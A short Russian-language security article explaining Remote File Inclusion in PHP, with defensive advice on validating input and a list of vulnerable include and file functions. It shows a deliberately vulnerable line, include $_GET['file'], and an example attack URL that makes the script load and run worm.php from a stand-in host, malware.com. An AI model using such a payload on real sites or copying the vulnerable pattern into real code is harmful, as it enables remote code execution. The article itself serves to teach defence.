Опасность удаленного включения файлов

К списку статей

Удаленное подключение файлов (Remote File Include) - представляет собой метод атаки на веб-приложения, которые используют файлы подключаемые динамически. Основной сутью данного метода является подключение файлов, носящих вредоносный код на выбранный для атаки сайт или сервер.

В чем суть атаки? А, собственно, в следующем: злоумышленник сканирует приложения на наличие уязвимостей, которые и являются методами подключения файлов. В случае находки подобной уязвимости, он тестирует ее на различные методы, которыми будет подключен вредоносный код.

Например:

...
include $_GET['file'];
...

Если подобная строка кода вписывается в середине скрипта, то подключение файла происходит через переменную file, получая путь методом GET. Из предыдущих статей мы знаем, что все переменные получаемые двумя методами GET и POST могут легко изменяться пользователем. Если путь к файлу посредством вашего скрипта происходит подобным способом, то злоумышленник его изменяет:

script.php?file=primer.txt

на

script.php?file=http://malware.com/worm.php

после чего последует загрузка скрипта с другого сервера, затем произойдёт выполнение вредоносного кода.

Без изменений остается один совет для обеспечения безопасности таких скриптов: для входящих переменных необходима предварительная проверка. Во время обработки внимательно следите за типом переменной, её длиной и регулярными выражениями.

Следующие функции являются уязвимыми:

include()
require()
include_once()
require_once()
file_get_contents()
fopen()

Обработка входящих данных крайне важна для безопасности веб-приложений, потому что злоумышленником может быть любой пользователь. Поэтому важно проверять каждый запрос от пользователя.